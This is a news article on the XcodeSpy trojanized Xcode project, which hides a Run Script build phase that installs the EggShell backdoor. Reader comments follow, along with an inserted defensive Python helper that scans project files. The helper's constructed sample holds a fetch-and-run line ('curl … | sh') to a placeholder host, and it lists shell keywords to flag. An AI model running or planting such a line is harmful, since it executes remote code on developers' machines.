Security Researchers Discover XcodeSpy Malware That Targets Developers

Developers need to look out for "XcodeSpy," a malicious Xcode project that installs a custom variant of the "EggShell" backdoor on a macOS computer, according to new research shared today by SentinelOne (via Ars Technica).

Xcode is Apple's development environment for writing iOS and macOS apps, and the malicious project in circulation mirrors TabBarInteraction, a legitimate open source project.

Developers who download the XcodeSpy project think they're getting TabBarInteraction, but the malware includes a hidden "Run Script" build phase that downloads and installs the open source EggShell backdoor, which can spy on users through the microphone, camera, and keyboard as well as upload and download files.

Two variants of the custom EggShell backdoor were found uploaded in Japan, first in August and then in October, so the attack has been out in the wild for some time.

We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggests that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.

SentinelOne says that all Apple developers who use Xcode should exercise caution when using shared Xcode projects.
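As an added example (not code from the article or from SentinelOne), a small Python helper that lists every Run Script build phase in a shared project's project.pbxproj so the scripts can be read before the project is built; the sample project text and the keyword heuristic are constructed here.

```python
"""Hypothetical helper (not SentinelOne's or Apple's tooling): list the Run Script
build phases in a project.pbxproj so a shared project can be reviewed before building."""
import re

# project.pbxproj is an old-style plist: each object is `<24-hex id> /* c */ = { ... };`
_OBJECT_RE = re.compile(
    r"(?P<id>[0-9A-F]{24})\s*(?:/\*.*?\*/)?\s*=\s*\{(?P<body>.*?)\n\t\t\};", re.S)
_FIELD_RE = re.compile(r'(?P<key>\w+)\s*=\s*(?P<val>"(?:[^"\\]|\\.)*"|[^;]+);')

# Heuristic only: a phase that fetches or decodes content and runs it deserves a manual read.
SUSPICIOUS = ("curl", "wget", "base64", "eval", "osascript", "| sh", "| bash")


def _unquote(val: str) -> str:
    # Strip surrounding quotes and unescape \" and \n as pbxproj stores them (ASCII input).
    val = val.strip()
    if len(val) >= 2 and val[0] == val[-1] == '"':
        val = val[1:-1].encode().decode("unicode_escape")
    return val


def run_script_phases(pbxproj: str) -> list:
    """Return one dict (id, name, script, suspicious) per PBXShellScriptBuildPhase."""
    phases = []
    for obj in _OBJECT_RE.finditer(pbxproj):
        fields = {m.group("key"): _unquote(m.group("val"))
                  for m in _FIELD_RE.finditer(obj.group("body"))}
        if fields.get("isa") != "PBXShellScriptBuildPhase":
            continue
        script = fields.get("shellScript", "")
        phases.append({"id": obj.group("id"), "name": fields.get("name", "Run Script"),
                       "script": script, "suspicious": any(t in script for t in SUSPICIOUS)})
    return phases


# Constructed sample: a compile phase (ignored), a benign script, and a script that
# pipes downloaded content into a shell, which is the pattern the heuristic flags.
SAMPLE_PBXPROJ = "\n".join([
    "\t\tAB12CD34EF56AB12CD34EF56 /* Sources */ = {",
    "\t\t\tisa = PBXSourcesBuildPhase;",
    "\t\t};",
    "\t\t0123456789ABCDEF01234567 /* Run Script */ = {",
    "\t\t\tisa = PBXShellScriptBuildPhase;",
    "\t\t\tname = \"Run Script\";",
    "\t\t\tshellScript = \"echo \\\"build $(date)\\\" > build.log\\n\";",
    "\t\t};",
    "\t\tFEDCBA9876543210FEDCBA98 /* Run Script */ = {",
    "\t\t\tisa = PBXShellScriptBuildPhase;",
    "\t\t\tshellScript = \"curl -s http://example.invalid/stage | sh\\n\";",
    "\t\t};",
])
```

Run `run_script_phases(open("MyApp.xcodeproj/project.pbxproj").read())` on a downloaded project and read every returned script, flagged or not, before pressing Build.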


Top Rated Comments

jonnysods Avatar
7 months ago
Get ready for lots of Justin Long Intel videos about this next week.
Score: 9 Votes (Like | Disagree)
Apple_Robert Avatar
27 weeks ago

Laughing on my Linux developer laptop.
What is so funny? It's not like Linux hasn't had Malware problems.
Score: 7 Votes (Like | Disagree)
I7guy Avatar
7 months ago
Comes under the heading, be very careful about what you download.
Score: 6 Votes (Like | Disagree)
hot-gril Avatar
7 months ago

Why is it being called a Trojan when it has to be actively installed?
Cause that's what trojans are.
Score: 5 Votes (Like | Disagree)
hot-gril Avatar
27 weeks ago

Comes under the heading, be very careful about what you download.
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, ofc necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using Cocoapods, which is. Of course other dev platforms have similar risks.
Score: 4 Votes (Like | Disagree)
Unsupported Avatar
27 weeks ago

Why is it being called a Trojan when it has to be actively installed?
https://usa.kaspersky.com/resource-center/threats/trojans

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system. These actions can include:

• Deleting data
• Blocking data
• Modifying data
• Copying data
• Disrupting the performance of computers or computer networks


Modifying data?

So it could infect the project that the developer is working on?

Nasty!
Score: 3 Votes (Like | Disagree)
